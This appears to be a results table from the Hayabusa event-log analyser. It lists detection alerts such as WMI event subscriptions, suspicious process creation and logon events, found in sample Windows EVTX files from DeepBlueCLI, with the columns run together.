2792013-10-24 04:36:53.245 +09:00IE8Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2802013-10-24 04:36:53.245 +09:00IE8Win74616mediumUnauthorized System Time Modificationrules/sigma/builtin/security/win_susp_time_modification.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2812013-10-24 04:38:41.448 +09:00IE8Win74648informationalExplicit LogonSource User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhostrules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2822013-10-24 04:38:41.448 +09:00IE8Win74624informationalLogon Type 2 - InteractiveUser: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x24902 : (Warning: Credentials are stored in memory)rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2832013-10-24 04:38:41.448 +09:00IE8Win74624informationalLogon Type 2 - InteractiveUser: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x24936 : (Warning: Credentials are stored in memory)rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2842013-10-24 04:38:41.448 +09:00IE8Win74672informationalAdmin LogonUser: IEUser : LogonID: 0x24902rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2852013-10-24 04:39:04.000 +09:00IE8Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2862013-10-24 04:39:04.000 +09:00IE8Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2872013-10-24 04:42:34.667 +09:00IE8Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2882013-10-24 04:42:34.667 +09:00IE8Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2892013-10-24 04:42:34.667 +09:00IE8Win74616mediumUnauthorized System Time Modificationrules/sigma/builtin/security/win_susp_time_modification.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2902013-10-24 04:42:56.213 +09:00IE8Win74647informationalLogoff - User InitiatedUser: IEUser : LogonID: 0x24936rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2912013-10-24 04:43:44.838 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2922013-10-24 04:44:02.385 +09:00IE8Win721highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2932013-10-24 04:45:27.593 +09:00IE8Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2942013-10-24 04:45:27.593 +09:00IE8Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2952013-10-24 04:45:58.015 +09:00IE8Win74624informationalLogon Type 0 - SystemBootuprules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2962013-10-24 04:46:01.000 +09:00IE8Win74625mediumFailed Logon From Public IPrules/sigma/builtin/security/win_susp_failed_logon_source.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2972013-10-24 04:46:10.368 +09:00IE8Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2982013-10-24 04:46:10.368 +09:00IE8Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2992013-10-24 04:46:10.368 +09:00IE8Win74616mediumUnauthorized System Time Modificationrules/sigma/builtin/security/win_susp_time_modification.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
3002013-10-24 04:47:07.743 +09:00IE8Win74648informationalExplicit LogonSource User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhostrules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
3012013-10-24 04:47:07.743 +09:00IE8Win74624informationalLogon Type 2 - InteractiveUser: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x19489 : (Warning: Credentials are stored in memory)rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
3022013-10-24 04:47:07.743 +09:00IE8Win74624informationalLogon Type 2 - InteractiveUser: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x194bb : (Warning: Credentials are stored in memory)rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
3032013-10-24 04:47:07.743 +09:00IE8Win74672informationalAdmin LogonUser: IEUser : LogonID: 0x19489rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
3042013-10-24 04:48:32.133 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3052013-10-24 04:48:32.133 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3062013-10-24 04:49:30.000 +09:00IE8Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
3072013-10-24 04:49:30.000 +09:00IE8Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
3082013-10-24 04:54:00.258 +09:00IE8Win74647informationalLogoff - User InitiatedUser: IEUser : LogonID: 0x194bbrules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
3092013-10-24 04:54:45.140 +09:00IE8Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3102013-10-24 04:54:45.140 +09:00IE8Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3112013-10-24 04:54:58.140 +09:00IE8Win74624informationalLogon Type 0 - SystemBootuprules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
3122013-10-24 04:55:02.000 +09:00IE8Win74625mediumFailed Logon From Public IPrules/sigma/builtin/security/win_susp_failed_logon_source.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
3132013-10-24 04:55:06.370 +09:00IE8Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3142013-10-24 04:55:06.370 +09:00IE8Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3152013-10-24 04:55:06.370 +09:00IE8Win74616mediumUnauthorized System Time Modificationrules/sigma/builtin/security/win_susp_time_modification.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
3162013-10-24 04:55:29.463 +09:00IE8Win74648informationalExplicit LogonSource User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhostrules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
3172013-10-24 04:55:29.463 +09:00IE8Win74624informationalLogon Type 2 - InteractiveUser: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x19153 : (Warning: Credentials are stored in memory)rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
3182013-10-24 04:55:29.463 +09:00IE8Win74624informationalLogon Type 2 - InteractiveUser: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1917f : (Warning: Credentials are stored in memory)rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
3192013-10-24 04:55:29.463 +09:00IE8Win74672informationalAdmin LogonUser: IEUser : LogonID: 0x19153rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
3202013-10-24 04:57:31.000 +09:00IE8Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
3212013-10-24 04:57:31.000 +09:00IE8Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
3222013-10-24 04:59:43.385 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3232013-10-24 05:17:38.760 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3242013-10-24 05:21:25.557 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3252013-10-24 05:27:57.838 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3262013-10-24 05:38:14.682 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3272013-10-24 05:49:57.323 +09:00IE8Win74647informationalLogoff - User InitiatedUser: IEUser : LogonID: 0x1917frules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
3282013-10-24 05:53:53.609 +09:00IE8Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3292013-10-24 05:53:53.609 +09:00IE8Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3302013-10-24 05:54:11.078 +09:00IE8Win74624informationalLogon Type 0 - SystemBootuprules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
3312013-10-24 05:54:23.000 +09:00IE8Win74625mediumFailed Logon From Public IPrules/sigma/builtin/security/win_susp_failed_logon_source.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
3322013-10-24 05:54:29.619 +09:00IE8Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3332013-10-24 05:54:29.619 +09:00IE8Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3342013-10-24 05:54:29.619 +09:00IE8Win74616mediumUnauthorized System Time Modificationrules/sigma/builtin/security/win_susp_time_modification.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
3352013-10-24 05:55:00.775 +09:00IE8Win74648informationalExplicit LogonSource User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhostrules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
3362013-10-24 05:55:00.775 +09:00IE8Win74624informationalLogon Type 2 - InteractiveUser: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x2b15e : (Warning: Credentials are stored in memory)rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
3372013-10-24 05:55:00.775 +09:00IE8Win74624informationalLogon Type 2 - InteractiveUser: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x2b18a : (Warning: Credentials are stored in memory)rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
3382013-10-24 05:55:00.775 +09:00IE8Win74672informationalAdmin LogonUser: IEUser : LogonID: 0x2b15erules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
3392013-10-24 05:56:26.259 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3402013-10-24 05:56:26.259 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3412013-10-24 05:56:26.259 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3422013-10-24 05:56:26.259 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3432013-10-24 05:56:26.259 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3442013-10-24 05:56:26.259 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3452013-10-24 05:56:26.259 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3462013-10-24 05:56:26.259 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3472013-10-24 05:56:26.259 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3482013-10-24 05:56:26.259 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3492013-10-24 05:56:26.259 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3502013-10-24 05:56:26.259 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3512013-10-24 05:56:26.259 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3522013-10-24 05:56:26.259 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3532013-10-24 05:56:26.259 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3542013-10-24 05:56:26.259 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3552013-10-24 05:56:26.259 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3562013-10-24 05:56:26.259 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3572013-10-24 05:56:26.259 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3582013-10-24 05:56:26.259 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3592013-10-24 05:56:26.259 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3602013-10-24 05:56:26.259 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3612013-10-24 05:56:26.259 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3622013-10-24 05:56:26.259 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3632013-10-24 05:56:26.259 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3642013-10-24 05:56:26.259 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3652013-10-24 05:56:26.259 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3662013-10-24 05:56:26.259 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3672013-10-24 05:56:26.259 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3682013-10-24 05:56:26.259 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3692013-10-24 05:56:26.259 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3702013-10-24 05:56:26.259 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3712013-10-24 05:56:26.259 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3722013-10-24 05:56:26.259 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3732013-10-24 05:56:26.259 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3742013-10-24 05:56:26.275 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3752013-10-24 05:56:26.275 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3762013-10-24 05:56:26.275 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3772013-10-24 05:56:26.275 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3782013-10-24 05:56:26.275 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3792013-10-24 05:56:26.275 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3802013-10-24 05:56:26.275 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3812013-10-24 05:56:26.275 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3822013-10-24 05:56:26.275 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3832013-10-24 05:56:26.275 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3842013-10-24 05:56:26.275 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3852013-10-24 05:56:26.275 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3862013-10-24 05:56:26.275 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3872013-10-24 05:56:26.275 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3882013-10-24 05:56:26.275 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3892013-10-24 05:56:26.275 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3902013-10-24 05:56:26.275 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3912013-10-24 05:56:26.275 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3922013-10-24 05:56:26.275 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3932013-10-24 05:56:26.275 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3942013-10-24 05:56:28.619 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3952013-10-24 05:56:36.634 +09:00IE8Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3962013-10-24 05:56:36.634 +09:00IE8Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3972013-10-24 05:56:36.649 +09:00IE8Win74616mediumUnauthorized System Time Modificationrules/sigma/builtin/security/win_susp_time_modification.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
3982013-10-24 05:56:52.000 +09:00IE8Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
3992013-10-24 05:56:52.000 +09:00IE8Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
4002013-10-24 06:05:37.180 +09:00IE8Win74647informationalLogoff - User InitiatedUser: IEUser : LogonID: 0x2b18arules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4012013-10-24 06:07:06.390 +09:00IE8Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
4022013-10-24 06:07:06.390 +09:00IE8Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
4032013-10-24 06:07:31.859 +09:00IE8Win74624informationalLogon Type 0 - SystemBootuprules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4042013-10-24 06:07:35.000 +09:00IE8Win74625mediumFailed Logon From Public IPrules/sigma/builtin/security/win_susp_failed_logon_source.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
4052013-10-24 06:07:44.487 +09:00IE8Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
4062013-10-24 06:07:44.487 +09:00IE8Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
4072013-10-24 06:07:44.487 +09:00IE8Win74616mediumUnauthorized System Time Modificationrules/sigma/builtin/security/win_susp_time_modification.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4082013-10-24 06:09:53.000 +09:00IE8Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
4092013-10-24 06:09:53.000 +09:00IE8Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
4102013-10-24 06:10:53.299 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
4112013-10-24 06:13:38.283 +09:00IE8Win74648informationalExplicit LogonSource User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhostrules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
